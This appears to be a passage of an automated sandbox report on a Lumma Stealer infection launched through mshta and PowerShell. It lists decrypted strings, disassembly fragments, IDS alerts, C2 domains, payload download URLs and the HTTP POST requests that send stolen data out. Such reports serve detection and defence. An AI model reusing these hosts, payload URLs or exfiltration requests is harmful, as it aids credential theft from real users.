                Source: 8.2.powershell.exe.4f0000.0.unpackString decryptor: rebuildeso.buzz
                Source: 8.2.powershell.exe.4f0000.0.unpackString decryptor: prisonyfork.buzz
                Source: 8.2.powershell.exe.4f0000.0.unpackString decryptor: crackerdolk.click
                Source: 8.2.powershell.exe.4f0000.0.unpackString decryptor: lid=%s&j=%s&ver=4.0
                Source: 8.2.powershell.exe.4f0000.0.unpackString decryptor: TeslaBrowser/5.5
                Source: 8.2.powershell.exe.4f0000.0.unpackString decryptor: - Screen Resoluton:
                Source: 8.2.powershell.exe.4f0000.0.unpackString decryptor: - Physical Installed Memory:
                Source: 8.2.powershell.exe.4f0000.0.unpackString decryptor: Workgroup: -
                Source: 8.2.powershell.exe.4f0000.0.unpackString decryptor: jMw1IE--bigJ
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00508BD5 CryptUnprotectData,8_2_00508BD5
                Source: unknownHTTPS traffic detected: 104.21.72.190:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49931 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49936 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49945 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49951 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49957 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49965 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49969 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49975 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49982 version: TLS 1.2
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4dJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreCommonProxyStub.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\COMCTL32.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\USERENV.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ecx8_2_00529A70
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx8_2_004F9AD0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_00515560
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [eax+edx], 0000h8_2_004FADE9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [edx], cx8_2_00508592
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push ebx8_2_00508592
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ecx8_2_00508592
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov esi, eax8_2_0052B5B2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [esp+04h], eax8_2_0051B744
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 6B77B5E1h8_2_0052E780
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, bx8_2_00513011
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [edx]8_2_00524010
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx+6B6EEEC4h]8_2_0052D020
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi-0D9327CAh]8_2_0052D020
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx8_2_0050F8F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx+6B6EEEC4h]8_2_0052D0B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi-0D9327CAh]8_2_0052D0B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [ebp+eax+00h]8_2_004FA8B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 4B1BF3DAh8_2_0052E910
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov esi, eax8_2_0050590C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh8_2_0052A120
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_005111C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx8_2_005111C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_005159F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [esi+08h], 00000000h8_2_004FB188
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then dec ebp8_2_0052CA70
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], al8_2_0050AA00
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-08DA5397h]8_2_004F9210
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_004FB2DC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [esi+08h], 00000000h8_2_004FB2DC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+08h]8_2_004FBAEE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp cl, 0000002Eh8_2_00515AE5
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6A99DBB9h]8_2_00515AE5
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [esp+04h], eax8_2_0051BA95
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]8_2_005192B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], 000Ah8_2_00514B4E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx eax, byte ptr [ebp+esi-38h]8_2_00514B4E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ebp8_2_004FA370
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [esi+08h], 00000000h8_2_004FB30C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp edx8_2_00511C71
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+28h]8_2_004F7410
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]8_2_004F7410
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [esi+08h], 00000000h8_2_004FB4E6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [esi+08h], 00000000h8_2_004FB4E6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 0827F28Dh8_2_005044A7
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov esi, ebx8_2_00517560
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_00517560
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp cl, 0000002Eh8_2_00515DD7
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6A99DBB9h]8_2_00515DD7
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx8_2_004F95D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]8_2_0050DDB0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], al8_2_005075BE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx+6B6EEEC4h]8_2_0052CDA0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi-0D9327CAh]8_2_0052CDA0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], EACC7C31h8_2_00505E4D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov esi, dword ptr [ebp+0Ch]8_2_00505E4D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp dword ptr [00534C10h]8_2_00517E01
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_0052AE2E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]8_2_0052AE2E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_0052AE2E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx+6B6EEEC4h]8_2_0052CEC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi-0D9327CAh]8_2_0052CEC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h8_2_0052D6F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [esi+eax+58h]8_2_0050A690
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax-1E5C1D94h]8_2_00518751
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], al8_2_004F8F60
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [edx]8_2_00523FF2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h8_2_005197E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], DA026237h8_2_00511FB0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ebp+2DBB26ABh]8_2_005147B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], DA026237h8_2_00511FAE

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49936 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49936 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49931 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49931 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49975 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49969 -> 104.21.80.1:443
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: crackerdolk.click
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: global trafficHTTP traffic detected: GET /vankok.vstx HTTP/1.1Host: cdn1.klipbazyxui.shopConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
                Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49931 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49945 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49957 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49951 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49936 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49969 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49965 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49975 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49982 -> 185.161.251.21:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crackerdolk.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: crackerdolk.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3E5I09CJ5Y2HCVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12810Host: crackerdolk.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5P599PVXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15016Host: crackerdolk.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DEXSTRMOARUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20518Host: crackerdolk.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SIAS21YXWH20User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1218Host: crackerdolk.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2LCF5MWZE75RL6K0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1099Host: crackerdolk.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: crackerdolk.click
                Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /vankok.vstx HTTP/1.1Host: cdn1.klipbazyxui.shopConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
                Source: global trafficDNS traffic detected: DNS query: cdn1.klipbazyxui.shop
                Source: global trafficDNS traffic detected: DNS query: crackerdolk.click
                Source: global trafficDNS traffic detected: DNS query: cegu.shop
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crackerdolk.click
                Source: powershell.exe, 00000002.00000002.2152519562.0000000007930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftkC0
                Source: powershell.exe, 00000002.00000002.2150261322.00000000061EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000004.00000002.3274235725.0000000004CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.2147721025.0000000005181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3274235725.0000000004B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.3274235725.0000000004CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000002.00000002.2147721025.0000000005181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3274235725.0000000004B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
                Source: powershell.exe, 00000004.00000002.3274235725.0000000004CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn1.klipbazyxui.shop
                Source: powershell.exe, 00000004.00000002.3274235725.0000000004B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn1.klipbazyxui.shop/vankok.vstx
                Source: powershell.exe, 00000008.00000002.4462317019.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/
                Source: powershell.exe, 00000008.00000002.4462317019.000000000069C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4462317019.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4460679156.00000000004AB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
                Source: powershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crackerdolk.click/
                Source: powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crackerdolk.click/api
                Source: powershell.exe, 00000008.00000002.4465039949.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crackerdolk.click/api-
                Source: powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crackerdolk.click/apiH
                Source: powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crackerdolk.click/i
                Source: powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crackerdolk.click/r
                Source: powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crackerdolk.click/wn
                Source: powershell.exe, 00000008.00000002.4465996133.0000000004C63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4465916292.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4463612198.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
                Source: powershell.exe, 00000004.00000002.3274235725.0000000004CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: powershell.exe, 00000008.00000002.4464750397.000000000071F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
                Source: powershell.exe, 00000008.00000002.4464750397.000000000071F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtZR
                Source: powershell.exe, 00000008.00000002.4464750397.000000000071F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txts=Rc
                Source: powershell.exe, 00000002.00000002.2150261322.00000000061EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                Source: unknownHTTPS traffic detected: 104.21.72.190:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49931 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49936 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49945 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49951 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49957 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49965 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49969 version: TLS 1.2
